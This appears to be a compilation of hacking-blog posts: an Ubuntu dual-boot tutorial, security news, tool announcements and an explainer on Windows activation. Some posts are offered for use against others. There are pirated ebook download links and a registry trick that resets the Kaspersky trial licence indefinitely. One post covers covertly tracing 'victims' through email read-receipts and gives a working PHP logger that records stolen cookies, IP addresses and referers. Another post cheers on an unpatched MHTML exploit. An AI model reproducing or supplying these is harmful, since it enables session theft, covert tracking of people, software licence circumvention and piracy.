Installing Ubuntu - A tutorial for All

Recently I installed Ubuntu [Linux] as a dual boot OS with Seven already installed on my Machine. I faced a lot of problems, but the end result was worth all the trouble as Ubuntu rocks

In this thread I will post the step by step method to install Ubuntu (or any of its other versions such as Mint) as a dual boot OS on Seven machine. I will also specify some mistakes I made and what I learned outta those.

The first step to install Ubuntu was to creat a partition on my existing hard drive. There are two ways how you can do it in Seven:

1. In built 'Shrink Disc' feature in Seven
2. Use a disk partition software to do it for you.

Ubuntu or Mint comes with an inbuilt disk partitioner. What is required is a unallocated free space on your hard drive so that it can be partitioned while installing Ubuntu.

1. Making Space using "Shrink Disc" feature in Seven:
a. Log on to Seven.
b. Right-Click on "My computer" in the main menu and select "Manage"
c. It will ask for administrator password, enter it and click "allow"
d. Click on Disc Management.
e. There is will show the available partitions and external storage devices if any
f. Right Click on the disc partition you want to shrink and select "shrink volume"
g. Seven will assess how much space can be made free.
h. It will suggest the value which can be made free. Be sure that this is at least 10-15 GB. If you dont have this space, you will have to delete some data to make space for the partition.
i. Then select "shrink"
j. Seven will shrink the volume and show the new freed space as "unallocated" space.
k. After this close the window. You are done with shrinking

2. Making Space using a Disk Partition software:
a. I had problem that Seven used to say "access denied" when I tried to shrink the main C: Drive (I had only on partition )
b. So I used a Free Disk Partition Software to shrink the space.
c. You can use the following software: EasyUS partition Master-Home Edition which you can download here:
d. Using this it is easy to create space for a new partition.
e. Using the above program, select the partition you want to shrink/resize
f. Using the "Resize" tool you can shrink the volume and the rest of the space would be shown as "unallocated space"
g. Apply the changes and you are done


The next step is to install Ubuntu

1. You will need to download the latest ISO for Ubuntu or Mint from here:

2. You will need to burn this ISO image on to a CD (700 MB or more).
3. For burning this ISO you will have to use an ISO burning software. One such free software is: Free ISO burner:
4. Be sure to burn the ISO image at a very slow speed. This extra time spent will help you install Linux trouble-free.
5. When the disc is ready, restart the computer. Be sure that in BIOS setup the CD drive is above the hard disc in boot priority.
6. Once restarted the disc will boot before the hard disc.
7. In the menu that is displayed, select "run installer" and follow the instructions.
8. Once you have selected language, Location and Keyboard configuration....the disk partitioner of ubuntu will run and show you various options as to where Ubuntu should be installed.
9. Select "Largest continuous free space" as this will select the "unallocated space" that we have created in the earlier step.
10. After this follow the next instructions to complete the installation.
11. The installation will prompt you to import the settings from Seven. If you want do import these.
12. I preferred not to import as it will copy the documents from Seven partition to the new partition of Ubuntu and just eat up the partition space. You can always access the Seven documents from Ubuntu as Seven partion will be shown as a hard disk in "My computer".
13. Complete the installation. It will prompt to restart the computer. Do so.
14. After restart, the menu will show Ubuntu and Seven a dual boot OS and now you are free to choose the OS you want to load

Hacking Exposed: Web Applications Ebook 3rd Edition

The latest Web app attacks and countermeasures from world-renowned practitioners Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource.

* Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster * See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation * Understand how attackers defeat commonly used Web authentication technologies * See how real-world session attacks leak sensitive data and how to fortify your applications * Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques * Find and fix vulnerabilities in ASP.NET, PHP, and J2EE execution environments * Safety deploy XML, social networking, cloud computing, and Web 2.0 services * Defend against RIA, Ajax, UGC, and browser-based, client-side exploits * Implement scalable threat modeling, code review, application scanning, fuzzing, and security testing procedures

download: Hacking Exposed: Web Applications Ebook 3rd Edition
FileSonic.com     letitbit.net

IPAD 2 JAILBROKEN IN JUST ONE WEEK

Hackers have already managed to break open Apple's latest iPad, with developer and hacker Comex saying he had managed to do so remotely over the weekend. While proof of the jailbreak has shown up in photos and video on the Internet, it will not be made available immediately as it must be packaged for public use.

According to talk on Twitter, versions for both the Wi-Fi and 3G models of the iPad could be released shortly, although no specific date for its release has been given.

While the speed of the jailbreak may be surprising, iOS 4.3 (which the iPad runs on) had also been cracked open quickly: hackers there only needed about 24 hours. In that case developers likely had access to beta versions of the operating system, allowing those working on the crack to test out their work before iOS 4.3's actual release.

Details on the actual jailbreak have not been disclosed, probably to prevent Apple from moving quickly to close the hole. "Would've had it yesterday if I didn't have to spend 1.5 days looking for a replacement exploit (which came from a most unexpected place…)," Comex tweeted Sunday.

He also used a friend's iPad nearly 2,500 miles away and jailbroke it remotely, meaning whatever was done to hack the tablet device may be able to be done akin to what the iPhone Dev Team did with jailbreakme.com last August.

As always, jailbreaking any iOS device comes with risks. There is no guarantee that the hack will work on every device, and updates can sometimes cause the hack to stop working. Additionally, Apple's warranty becomes void if a device is jailbroken.

MHTML EXPLOIT LATEST MICROSOFT BUG :P

Latest microsoft MHTML exploit is in fashion for hackers ;)

Microsoft is investigating new public reports of vulnerability in all supported editions of Microsoft Windows. The vulnerability could allow an attacker to cause a victim to run malicious scripts when visiting various Web sites, resulting in information disclosure. This impact is similar to server-side cross-site scripting (XSS) vulnerabilities.

MHTML, or Mime HTML, is a standard that allows web objects such as images to be combined with HTML into a single file. The vulnerability lies in how MHTML interprets Multipurpose Internet Mail Extensions (Mime) for content blocks in a document.

On a Blog post Friday afternoon Google Security Team members said “We’ve noticed some highly targeted and apparently politically motivated attacks against our users. We believe activists may have been a specific target. We’ve also seen attacks against users of another popular social site.”

Now we are finding that Microsoft and Google are working to create a fix on the server side so it can reduce the risk of MHTML Vulnerability, while you can check your machine to determine if you are vulnerable by using the test scenario previously posted by Microsoft.

As a workaround user can also disable ActiveX, but this would affect web applications including banking and e-commerce sites that use ActiveX to provide online services.

 May be a sad news for normal users but :D you know what i mean to say enjoy the exploit guys its not patched yet :P

PWN2OWN OVERVIEW & RESULTS

The Zero Day Initiative team is having the annual Pwn2Own contest March 9th, 10th, and 11th of 2011 in Vancouver. The contest always seems to be an interesting spectacle – seeing how fast certain systems are compromised, learning how companies respond to the vulnerability disclosures, and seeing patches come out up to the very last minute. The targets this year will be 4 popular web browsers and 4 mobile devices.

Browers

This year the web browser targets will be the latest release candidate (at the time of the contest) of the following products:

• Microsoft Internet Explorer
• Apple Safari
• Mozilla Firefox
• Google Chrome

Each browser will be installed on a 64-bit system running the latest version of either OS X or Windows 7.
A successful hack of IE, Safari, or Firefox will net the competitor a $15,000 USD cash prize, the laptop itself, and 20,000 ZDI reward points which immediately qualifies them for Silver standing. Benefits of ZDI Silver standing include a one-time $5,000 USD cash payment, 15% monetary bonus on all ZDI submissions in 2011, 25% reward point bonus on all ZDI submissions in 2011 and paid travel and registration to attend the DEFCON Conference in Las Vegas.
As for Chrome, the contest will be a two-part one. On day 1, Google will offer $20,000 USD and the CR-48 if a contestant can pop the browser and escape the sandbox using vulnerabilities purely present in Google-written code. If competitors are unsuccessful, on day 2 and 3 the ZDI will offer $10,000 USD for a sandbox escape in non-Google code and Google will offer $10,000 USD for the Chrome bug. Either way, plugins other than the built-in PDF support are out of scope.

Mobile Devices

The following are the target mobile devices for the contest:

• Dell Venue Pro running Windows 7
• iPhone 4 running iOS
• Blackberry Torch 9800 running Blackberry 6 OS
• Nexus S running Android

As mentioned previously, we’ve upped the ante this time around and the total cash pool allotted for prizes has risen to a whopping $125,000 USD. While HP TippingPoint is funding $105,000 of that, we’ve partnered with Google who has generously offered up $20,000 to the researcher who can best their Chrome browser.

Interestingly, an RF enclosure box will be used for the mobile targets as there seems to be the possibility that

The Results of Pwn2Own 2011

 Browsers

“Safari goes down first at #pwn2own”
“Stephen Fewer @stephenfewer just successfully compromised Internet Explorer (complete with a Protected Mode bypass) at Pwn2Own.”
The exploit used to exploit IE8 is not present in IE9, which ships on Monday.
Chrome and Firefox, the other browsers in the contest, went unchallenged.

MOBILE PHONES

the Apple iPhone 4 and RIM’s Blackberry Torch 9800 were both successfully compromised on day 2 of the contest.
Android and Windows Phone 7 based devices survived the challenge.
It was a vulnerability in WebKit that allowed the Blackberry to be compromised. Google has responded by patching the exploit in their WebKit-based Google Chrome.

REPORTS


Ars Technica has good write-ups on Day 1 and Day 2 of Pwn2Own 2011. In those write-ups you’ll find a lot more details of the winners and some of the compromises.

 

W3af – Web Application Attack and Audit Framework

 w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .  

 If you are here just to "take a look" please watch the w3af video demos!


A nice tool to check web applications and a good frame work to carry out your tests. It is what Metasploit is for Network Penetration Testing.

 w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much more

 This tools lags a bit for windows but as its open source you cant complain :P Although runs smoothly on linux


You can download W3AF here

Mastering the Nmap Scripting Engine-Defcon 18

Most hackers can use Nmap for simple port scanning and OS detection, but the Nmap Scripting Engine (NSE) takes scanning to a whole new level. Nmap's high-speed networking engine can now spider web sites for SQL injection vulnerabilities, brute-force crack and query MSRPC services, find open proxies, and more. Nmap includes more than 130 NSE scripts for network discovery, vulnerability detection, exploitation, and authentication cracking.

Rather than give a dry overview of NSE, Fyodor and Nmap co-maintainer David Fifield demonstrate practical solutions to common problems. They have scanned millions of hosts with NSE and discuss vulnerabilities found on enterprise networks and how Nmap can be used to quickly detect those problems on your own systems. Then they demonstrate how easy it is to write custom NSE scripts by writing one from scratch and using it to hack a webcam. All in 38 minutes, as given live at Defcon 18!

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers — those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zukerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.

About the Author
Levy is a senior writer for Wired. Previously, he was chief technology writer and a senior editor for Newsweek. Levy has written six books and had articles published in Harper’s, Macworld, The New York Times Magazine, The New Yorker, Premiere, and Rolling Stone. Steven has won several awards during his 30+ years of writing about technology, including Hackers, which PC Magazine named the best Sci-Tech book written in the last twenty years and, Crypto, which won the grand eBook prize at the 2001 Frankfurt Book festival.

 Download :http://www.megaupload.com/?d=GZQ2G2F0
                   http://depositfiles.com/en/files/f3canuqmj

METASPLOIT v 3.6 RELEASED

All Metasploit editions are seeing an update to version 3.6 today, including an enhanced command-line feature set for increased proficiency and detailed PCI reports with pass/fail information for a comprehensive view of compliance posture with PCI regulations.

This release adds 15 new exploits for a total of 64 new modules since version 3.5.1. All editions of Metasploit now include Post Exploitation modules that provide local exploits and additional data gathering capabilities.

Metasploit Express and Metasploit Pro users benefit from the Project Activity Report and Global Search capabilities now available in the user interface. Metasploit Pro users now have access to the new Pro Console, PCI Report, and Asset Tagging features. The full release notes for the open source framework can be found online here  

GNACKTRACK R6

GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME!

 This version patches the compat-wireless modules, providing better support for injection and monitor mode. A Windows XP styled theme has also been included, allowing you to quickly emulate an Windows XP box!



r6 is the recent version of gnactrack

You can download GNACTRACKR6 here

Hacking A Biometric System

Description: This paper was presented in NullCOn 2011
"Penetration Testing Biometrics Systems "

You could read the detailed paper by following the below mentioned links.

PDF version: http://www.fb1h2s.com/Null_Biometrics.pdf

SAMURAI Web Testing Framework

Samurai is a LiveCD focused on web application testing. It comes with the top testing tools and pre-installed them to build the perfect environment for testing applications.



There are many people who are much interested into web sphere hacking this linux is especially designed for them

I had some problems with installing it on vmware but it was smooth on installing on HD :)

you can download samurai linux here

KASPERSKY-2011 LICENSE FOREVER

After this tut you will be able to use your KASPERSKY-2011 forever!

1st Download kaspersky trial version

now Go to Setting, then select Option, Uncheck the "Enable Self Defense" and click OK

Now right-click the kaspersky icon from taskbar and click on "Exit".


goto run and type in "regedit".

Now goto HKEY_LOCAL_MACHINE ---->SOFTWARE ---->KASPERSKYLAB ---->PROTECTED ---->AVP11 ---->ENVIRONMENT

Now in the right hand side you can see PCID. Double click it and change the last two values before the flower bracket and click ok.eg:- The last two values are "D7"... So change it to "F9"

ow open kaspersky again and Select "Activate Trial License" and click next.

Now enable Self-Defence and KASPERSKY-2011 LICENSE FOREVER

AFTER ONE MONTH REPEAT THE SAME PROCESS AGAIN..:)

HOW TO GET IP ADRESS EASILY

I have been getting requests that the content we are posting is not easy for beginners.I was little disappointed with such review so here we go simple yet effective post about very basic of intenet,networking the IP-address.

What is an IP address?
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a 'dotted-quad') and look something like 112.123.123.121(etc this is example of ipv4)

What can be done with an IP address?

IP adress is the very basic unit before you start a hack its basically used for fingerprinting,tracing and if victim is weak it wont take 10 secs to penetrate through vulnerability :)

HOW can I get an IP address?

Its an easy task to get your aswell as others ip addresses
to get your own ip address just go to this website

How to get ip of a website?

go to shell(command prompt) just type ping www.target.com
and there it will start showing numeric just like in this picture

How to get IP address of friends or victims?

Using E-mail receipts


E-mail receipt is a kind of notification you get as an e-mail when someone open (reading the mail send by you) your mail.


This notification consist of

• IP address of the mail reader.
• Time and date of reading the mail.
• Name and version of his browser.

 You need to follow these steps


a. Step 1:-


Visit readnotify and signup there. You can use your gmail, yahoo, hotmail,rediff or any email id. They give free trials for 2 weeks or 25 emails whichever comes first.


b. Step 2:-


Let's say you have used your email id example@gmail.com to register on readnotify.com, than login to your email account first.


c. Step 3:-


Click on the Compose mail menu and in the To : section write the email id of the culprit followed by readnotify.com, so the complete email address would be like victim@gmail.com.readnotify.com. 
just the normal procedure of email

step 4
you are done just wait for the victim to open that email volla you will get the details.
 

Using php scripts 

here is the basic php script

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: http://google.com/")
?>

Process:save it in you hosting ripway,my3gb,blackapplehost etc dont forget to create a file.txt file which will save all the ips 

This will save ips with date,time,from where link came+u can redirect to another url just like i redirected to google in matter of seconds.

Upcoming post will be on fingerprinting with ip address so we can work with a flow.

Do share you views on this post i tried to keep it simple.

How Windows Product Activation Works

How Windows Product Activation Works

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.


WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

* Display Adapter
* SCSI Adapter
* IDE Adapter (effectively the motherboard)
* Network Adapter (NIC) and its MAC Address
* RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
* Processor Type
* Processor Serial Number
* Hard Drive Device
* Hard Drive Volume Serial Number (VSN)
* CD-ROM / CD-RW / DVD-ROM

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.

2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

* WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
* If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
* WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
* WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity